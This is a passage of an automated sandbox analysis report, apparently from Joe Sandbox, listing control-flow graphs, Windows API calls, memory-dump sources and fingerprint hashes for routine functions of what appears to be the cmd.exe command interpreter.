                                                                                                  control_flow_graph 1171 7ff7823e8d80-7ff7823e8da2 1172 7ff7823e8da4-7ff7823e8daf 1171->1172 1173 7ff7823e8db1-7ff7823e8db4 1172->1173 1174 7ff7823e8dcc 1172->1174 1176 7ff7823e8db6-7ff7823e8dbd 1173->1176 1177 7ff7823e8dbf-7ff7823e8dca Sleep 1173->1177 1175 7ff7823e8dd1-7ff7823e8dd9 1174->1175 1178 7ff7823e8ddb-7ff7823e8de5 _amsg_exit 1175->1178 1179 7ff7823e8de7-7ff7823e8def 1175->1179 1176->1175 1177->1172 1180 7ff7823e8e4c-7ff7823e8e54 1178->1180 1181 7ff7823e8e46 1179->1181 1182 7ff7823e8df1-7ff7823e8e0a 1179->1182 1183 7ff7823e8e56-7ff7823e8e69 _initterm 1180->1183 1184 7ff7823e8e73-7ff7823e8e75 1180->1184 1181->1180 1185 7ff7823e8e0e-7ff7823e8e11 1182->1185 1183->1184 1186 7ff7823e8e80-7ff7823e8e88 1184->1186 1187 7ff7823e8e77-7ff7823e8e79 1184->1187 1188 7ff7823e8e13-7ff7823e8e15 1185->1188 1189 7ff7823e8e38-7ff7823e8e3a 1185->1189 1190 7ff7823e8eb4-7ff7823e8ec8 call 7ff7823e37d8 1186->1190 1191 7ff7823e8e8a-7ff7823e8e98 call 7ff7823e94f0 1186->1191 1187->1186 1192 7ff7823e8e3c-7ff7823e8e41 1188->1192 1193 7ff7823e8e17-7ff7823e8e1b 1188->1193 1189->1180 1189->1192 1200 7ff7823e8ecd-7ff7823e8eda 1190->1200 1191->1190 1201 7ff7823e8e9a-7ff7823e8eaa 1191->1201 1198 7ff7823e8f28-7ff7823e8f3d 1192->1198 1195 7ff7823e8e2d-7ff7823e8e36 1193->1195 1196 7ff7823e8e1d-7ff7823e8e29 1193->1196 1195->1185 1196->1195 1203 7ff7823e8ee4-7ff7823e8eeb 1200->1203 1204 7ff7823e8edc-7ff7823e8ede exit 1200->1204 1201->1190 1205 7ff7823e8eed-7ff7823e8ef3 _cexit 1203->1205 1206 7ff7823e8ef9 1203->1206 1204->1203 1205->1206 1206->1198
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 4291973834-0
                                                                                                  • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                  • Instruction ID: dc3a7a5768d92eed43a4a366496f30c0b21a541ec11bf80ee71cb4318de85f04
                                                                                                  • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                  • Instruction Fuzzy Hash: C841FA39E08602D2F690BB11E950279A6A0FF88746FE40479D91D47AA1DFFDEC88C770

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1207 7ff7823e4a14-7ff7823e4a3e GetEnvironmentStringsW 1208 7ff7823e4a40-7ff7823e4a46 1207->1208 1209 7ff7823e4aae-7ff7823e4ac5 1207->1209 1210 7ff7823e4a48-7ff7823e4a52 1208->1210 1211 7ff7823e4a59-7ff7823e4a8f GetProcessHeap HeapAlloc 1208->1211 1210->1210 1212 7ff7823e4a54-7ff7823e4a57 1210->1212 1213 7ff7823e4a9f-7ff7823e4aa9 FreeEnvironmentStringsW 1211->1213 1214 7ff7823e4a91-7ff7823e4a9a memmove 1211->1214 1212->1210 1212->1211 1213->1209 1214->1213
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
                                                                                                  • memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
                                                                                                  • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1623332820-0
                                                                                                  • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                  • Instruction ID: 3997613204cc3af9422d16ec17921c005e864a1acfdc9a00d026a7f41c8fedd8
                                                                                                  • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                  • Instruction Fuzzy Hash: 91118F26A14B4282DA50AB02F414139BFA0FB8DF91BA99078DF4E03B44DE7DE885D760

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 1826527819-0
                                                                                                  • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                  • Instruction ID: a2ff4468f06232dc70d880a1e7dd6d4cb6fe6ade86fd3c9ce0328764aba34dfa
                                                                                                  • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                  • Instruction Fuzzy Hash: E90139719086828AE640BB25E4541B8FEA1FB8E756FA45174D94F07792DEBCA888C730
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3
                                                                                                  • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7823D92AC), ref: 00007FF7823E30CA
                                                                                                  • SetErrorMode.KERNELBASE ref: 00007FF7823E30DD
                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E30F6
                                                                                                  • SetErrorMode.KERNELBASE ref: 00007FF7823E3106
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$FullNamePathwcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1464828906-0
                                                                                                  • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                  • Instruction ID: 312ad0231d6973ac99dde9145f20c9e4e3b21c6ba7f742d4f0bfbd9db51933b7
                                                                                                  • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                  • Instruction Fuzzy Hash: 5A31C425A0865592E764BF15E41007EF660FB45B92FE48178DA4E43FD0DEFDE849C320
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                  • API String ID: 2221118986-3416068913
                                                                                                  • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                  • Instruction ID: 423b76c4641fe05239adfcc9ab6d587cde1923ab0086d4ed8240f3d0783d2ba6
                                                                                                  • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                  • Instruction Fuzzy Hash: 87112921A1874280EF50EB55E1642B99290BF84BE5FB84779EE6D4BBD5DE7CD480C320
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcschr
                                                                                                  • String ID: 2$COMSPEC
                                                                                                  • API String ID: 1764819092-1738800741
                                                                                                  • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                  • Instruction ID: 3e4a6c0cf2ccdfd2396138fb7afe1a49a3760ee3bf817341686a5cb0ab7cbccc
                                                                                                  • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                  • Instruction Fuzzy Hash: 685197A1E08342A5FB607B31A468379E396BF44B86FB44079DA4D43ED5DEACE844C760
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 4254246844-0
                                                                                                  • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                  • Instruction ID: c39dd80a59581e210bd5026aa9b88c4c8f8fbae6fed3db53ba25dc5fa151d35f
                                                                                                  • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                  • Instruction Fuzzy Hash: A441B325F0874296EE10AB00E4643B9E7A0FF89792FE44479D94E47F90DFBCE849C620
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                  • String ID:
                                                                                                  • API String ID: 2643372051-0
                                                                                                  • Opcode ID: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
                                                                                                  • Instruction ID: 66b3211645dbcc113554455a9723c0d26cd1546e27b955e3aad18ac803aeb091
                                                                                                  • Opcode Fuzzy Hash: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
                                                                                                  • Instruction Fuzzy Hash: 44F08672B19B4285EB40AB66F404075FEE1FF5D7A2BA59274D63E03794DEBC9884C220
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _get_osfhandle$ConsoleMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1591002910-0
                                                                                                  • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                  • Instruction ID: 815b9e161b42dcbc00516e1450e09704d648b3bfa50ebe8309110365b97ac533
                                                                                                  • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                  • Instruction Fuzzy Hash: BEF06235A19702CBE644AB11E945078BEA0FB8A712BB44134C90E87324DEBCA889CB30
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DriveType
                                                                                                  • String ID: :
                                                                                                  • API String ID: 338552980-336475711
                                                                                                  • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                  • Instruction ID: 1552b9c495b1198f31b028748a6ad8fad45433ecd7d8cfc6121c96ffa56d126e
                                                                                                  • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                  • Instruction Fuzzy Hash: 39E06567618640C6D7209B50E45106AF760FB8D749FD41525D98D83B24DB3CD199CF18
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
                                                                                                    • Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD
                                                                                                  • GetConsoleTitleW.KERNELBASE ref: 00007FF7823E5B52
                                                                                                    • Part of subcall function 00007FF7823E4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4297
                                                                                                    • Part of subcall function 00007FF7823E4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E42D7
                                                                                                    • Part of subcall function 00007FF7823E4224: memset.MSVCRT ref: 00007FF7823E42FD
                                                                                                    • Part of subcall function 00007FF7823E4224: memset.MSVCRT ref: 00007FF7823E4368
                                                                                                    • Part of subcall function 00007FF7823E4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4380
                                                                                                    • Part of subcall function 00007FF7823E4224: wcsrchr.MSVCRT ref: 00007FF7823E43E6
                                                                                                    • Part of subcall function 00007FF7823E4224: lstrcmpW.KERNELBASE ref: 00007FF7823E4401
                                                                                                  • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7823E5BC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 497088868-0
                                                                                                  • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                  • Instruction ID: f65f30f7ad848f1a1487826c341d407ed2b9ceb31849316831eeba10f3cbadfa
                                                                                                  • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                  • Instruction Fuzzy Hash: 7931D564B1C68252FA20B711E4741BDE290FF89B82FE44479E94E87F95DEBCE405C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1412018758-0
                                                                                                  • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                  • Instruction ID: 0acaeeffe5221622a478c68359f63696255b99e89004fe0622172e96b5870b2e
                                                                                                  • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                  • Instruction Fuzzy Hash: 3AE06D04F09207A1FE253BA2A86107892447F18742EA814B8DD0D0AF82EEACE499C330
                                                                                                  APIs
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1617791916-0
                                                                                                  • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                  • Instruction ID: 0b83759cb8bbf4c04520715e515cc31c47f5580e82245f16b140522067c25896
                                                                                                  • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                  • Instruction Fuzzy Hash: 69F03175E1864286EB44AB15F8500B8FBA0FB89B42BB89539D90E03754DF7CE885C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: exit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2483651598-0
